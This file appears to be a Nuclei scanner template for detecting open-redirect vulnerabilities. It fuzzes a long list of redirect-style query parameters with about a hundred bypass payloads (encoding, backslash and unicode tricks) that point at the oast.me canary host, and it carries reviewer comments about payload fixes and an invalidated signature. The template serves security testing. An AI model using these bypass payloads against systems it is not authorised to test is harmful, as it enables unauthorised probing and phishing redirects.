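# Nuclei DAST template: open-redirect detection via query-parameter fuzzing.
#
# Flow (all visible in this file):
#   1. Run only for GET requests (pre-condition).
#   2. Substitute every value of the `redirect` payload set into
#        a) a list of well-known redirect-style parameter names, and
#        b) any query parameter whose current value already matches "https?://".
#   3. Report a hit when the response is a 301/302/307 whose Location header
#      points at the oast.me canary host.
#
# Every payload must end up resolving to oast.me, because the Location matcher
# below only ever accepts `oast\.me`; a payload naming any other host is a
# wasted request that can never produce a finding.
id: open-redirect-bypass

info:
  name: Open Redirect Bypass
  author: ritikchaddha
  severity: medium
  description: >-
    Fuzzes common redirect-related query parameters, and any query parameter
    whose value is already an http(s) URL, with open-redirect bypass payloads
    pointing at oast.me. A finding is reported when the server answers with a
    301/302/307 whose Location header resolves to oast.me.
  metadata:
    max-request: 1
  tags: redirect,dast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      # All entries are strings; single quotes keep `\` literal (no escape
      # processing), which is what the backslash-based bypasses rely on.
      # {{Hostname}} / {{RootURL}} are expanded per target by nuclei.
      redirect:
        - "{{Hostname}}.oast.me"
        - "//oast.me"
        - '////oast.me'
        - "https:oast.me"
        - '\/\/oast.me/'
        - '/\/oast.me/'
        - "oast。me"
        - "//oast%E3%80%82me"
        - "//oast%00.me"
        - "@oast.me/"
        - '/\{{Hostname}}%40oast.me'
        - "{{Hostname}}@oast.me/"
        - "{{RootURL}}/http://www.oast.me/"
        - "{{RootURL}}?http://www.oast.me/"
        - '%09/oast.me/'
        - '%5C%5Coast.me/%252e%252e%252f'
        - '%5Coast.me'
        - '%5coast.me/%2f%2e%2e'
        - '%5c{{RootURL}}oast.me/%2f%2e%2e'
        - '../oast.me'
        - '.oast.me'
        - '/%5coast.me'
        - '////\;@oast.me'
        - '///oast.me'
        - '///oast.me/%2f%2e%2e'
        - '///oast.me@//'
        - '///{{RootURL}}oast.me/%2f%2e%2e'
        - '//;@oast.me'
        - '//\/oast.me/'
        - '//\@oast.me'
        - '//\oast.me'
        - '//\toast.me/'
        - '//oast.me/%2F..'
        - '//oast.me//'
        # Fully percent-encoded "//oast.me". The earlier encoding of this entry
        # decoded to "//interact.sh", a host the Location matcher never accepts,
        # so that request could not produce a finding.
        - '//%6f%61%73%74%2e%6d%65'
        - '//oast.me@//'
        - '//oast.me\toast.me/'
        - '//https://oast.me@//'
        - '/<>//oast.me'
        - '/\/\/oast.me/'
        - '/\/oast.me'
        - '/\oast.me'
        - '/oast.me'
        - '/oast.me/%2F..'
        - '/oast.me/'
        - '/oast.me/..;/css'
        - '/https:oast.me'
        - '/{{RootURL}}oast.me/'
        # Unicode characters that some URL parsers normalise or strip before
        # the host. The two "ー" entries below look identical; presumably they
        # are distinct code points (e.g. fullwidth vs halfwidth forms) — verify
        # the bytes and drop one if they are the same.
        - '/〱oast.me'
        - '/〵oast.me'
        - '/ゝoast.me'
        - '/ーoast.me'
        - '/ーoast.me'
        - '<>//oast.me'
        - '@oast.me'
        - '@https://oast.me'
        # NOTE: '\/\/oast.me/' already appears above and was listed twice;
        # the duplicate was removed to avoid sending the same request twice.
        - 'oast%E3%80%82me'
        - 'oast.me'
        - 'oast.me/'
        - 'oast.me//'
        - 'oast.me;@'
        - 'https%3a%2f%2foast.me%2f'
        - 'https:%0a%0doast.me'
        - 'https://%0a%0doast.me'
        - 'https://%09/oast.me'
        - 'https://%2f%2f.oast.me/'
        - 'https://%3F.oast.me/'
        - 'https://%5c%5c.oast.me/'
        - 'https://%5coast.me@'
        - 'https://%23.oast.me/'
        - 'https://.oast.me'
        - 'https://////oast.me'
        - 'https:///oast.me'
        - 'https:///oast.me/%2e%2e'
        - 'https:///oast.me/%2f%2e%2e'
        - 'https:///oast.me@oast.me/%2e%2e'
        - 'https:///oast.me@oast.me/%2f%2e%2e'
        - 'https://:80#@oast.me/'
        - 'https://:80?@oast.me/'
        - 'https://:@\@oast.me'
        - 'https://:@oast.me\@oast.me'
        - 'https://;@oast.me'
        - 'https://\toast.me/'
        - 'https://oast.me/oast.me'
        - 'https://oast.me/https://oast.me/'
        - 'https://www.\.oast.me'
        - 'https:/\/\oast.me'
        - 'https:/\oast.me'
        - 'https:/oast.me'
        - 'https:oast.me'
        - '{{RootURL}}oast.me'
        # Same remark as above for the two "ー" entries.
        - '〱oast.me'
        - '〵oast.me'
        - 'ゝoast.me'
        - 'ーoast.me'
        - 'ーoast.me'
        - 'redirect/oast.me'
        - 'cgi-bin/redirect.cgi?oast.me'
        - 'out?oast.me'
        - 'login?to=http://oast.me'
        - '#/oast.me'
        - '%0a/oast.me/'
        - '%0d/oast.me/'
        - '%00/oast.me/'

    fuzzing:
      # Rule 1: replace the value of any query parameter whose NAME is in the
      # list below; `mode: single` fuzzes one parameter per request.
      - part: query
        mode: single
        keys:
          - AuthState
          - URL
          - _url
          - callback
          - checkout
          - checkout_url
          - content
          - continue
          - continueTo
          - counturl
          - data
          - dest
          - dest_url
          - destination
          - dir
          - document
          - domain
          - done
          - download
          - feed
          - file
          - file_name
          - file_url
          - folder
          - folder_url
          - forward
          - from_url
          - go
          - goto
          - host
          - html
          - http
          - https
          - image
          - image_src
          - image_url
          - imageurl
          - img
          - img_url
          - include
          - langTo
          - load_file
          - load_url
          - login_to
          - login_url
          - logout
          - media
          - navigation
          - next
          - next_page
          - open
          - out
          - page
          - page_url
          - pageurl
          - path
          - picture
          - port
          - proxy
          - r
          - r2
          - redir
          - redirect
          - redirectUri
          - redirectUrl
          - redirect_to
          - redirect_uri
          - redirect_url
          - reference
          - referrer
          - req
          - request
          - ret
          - retUrl
          - return
          - returnTo
          - return_path
          - return_to
          - return_url
          - rt
          - rurl
          - show
          - site
          - source
          - src
          - target
          - to
          - u
          - uri
          - url
          - val
          - validate
          - view
          - window
          - back
          - cgi
          - follow
          - home
          - jump
          - link
          - location
          - menu
          - move
          - nav
          - orig_url
          - out_url
          - query
          - auth
          - callback_url
          - confirm_url
          - destination_url
          - domain_url
          - entry
          - exit
          - forward_url
          - go_to
          - goto_url
          - home_url
          - image_link
          - load
          - logout_url
          - nav_to
          - origin
          - page_link
          - redirect_link
          - ref
          - referrer_url
          - return_link
          - return_to_url
          - source_url
          - target_url
          - to_url
          - validate_url
          - DirectTo
          - relay
        fuzz:
          - "{{redirect}}"
      # Rule 2: regardless of name, replace the value of any query parameter
      # whose current VALUE matches the regex below (i.e. already carries a
      # URL), since such parameters are natural redirect targets.
      - part: query
        mode: single
        values:
          - "https?://" # Replace HTTP URLs with alternatives
        fuzz:
          - "{{redirect}}"

    # One confirmed redirect per target is enough; stop fuzzing after it.
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      # The Location header must begin with a scheme, "//", "/\\" or "/\",
      # optionally followed by host-ish characters (including "@", so that
      # "target.com@oast.me" is accepted), then oast.me. The trailing
      # `(\/|[^.].*)?$` rejects "oast.me." continuations such as
      # "oast.me.example.com" but still accepts any other character directly
      # after "oast.me"; tighten if that produces false positives.
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.me/r/idfD2e/1
      - type: status
        status:
          - 301
          - 302
          - 307

# NOTE(review): the digest below was computed over the original template
# body. Any change to this file (including the payload fixes above)
# invalidates it; re-sign the template before relying on signature checks.
# digest: 4a0a0047304502206a2882c605cac005cc99926e18ebd02dc43c4c31a756c745e7f4dd845ab2cca9022100d7cb3221c7842d7e9356fcd694217518a608885632f2cfd3e2abc52a2f26fad2:922c64590222798bb761d5b6d8e72950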